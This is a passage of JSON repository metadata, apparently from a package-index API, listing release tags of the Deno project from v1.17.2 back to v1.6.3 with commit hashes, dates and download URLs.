31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"http